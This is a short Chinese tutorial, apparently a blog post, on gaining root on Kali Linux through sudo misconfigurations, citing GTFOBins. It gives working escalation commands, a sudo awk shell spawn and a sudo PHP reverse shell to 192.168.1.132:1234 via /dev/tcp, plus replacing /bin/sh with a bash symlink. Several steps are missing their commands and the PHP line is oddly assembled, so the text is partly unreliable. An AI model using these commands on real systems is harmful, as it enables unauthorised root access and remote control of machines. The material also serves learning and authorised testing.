参考网站:https://gtfobins.github.io/
kali linux 下etc/sudoers 文件解析
sudo su 命令
当使用sudo命令进行提权时,需要验证当前用户的密码:
一,sudo more 命令提权
修改文件 /etc/sudoers
- kali ALL=(ALL) /usr/bin/more
复制代码
在执行命令时:
提权方法:
执行
接着输入
提权成功,如图
二,sudo awk 提权
修改文件 /etc/sudoers
执行命令:
- sudo awk 'BEGIN{system("/bin/sh")}'
复制代码 提权成功
三,php反弹提权
先在kali下执行以下命令,重建一下软连接
- rm -rf /bin/sh
- ln -s /bin/bash /bin/sh
复制代码 修改文件 /etc/sudoers
公网执行nc命令监听:
kali 下执行
- sudo php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/bash -i >& /dev/tcp/192.168.1.132/1234 0>&1");'
复制代码
查看公网cmd窗口变化
提权成功。
|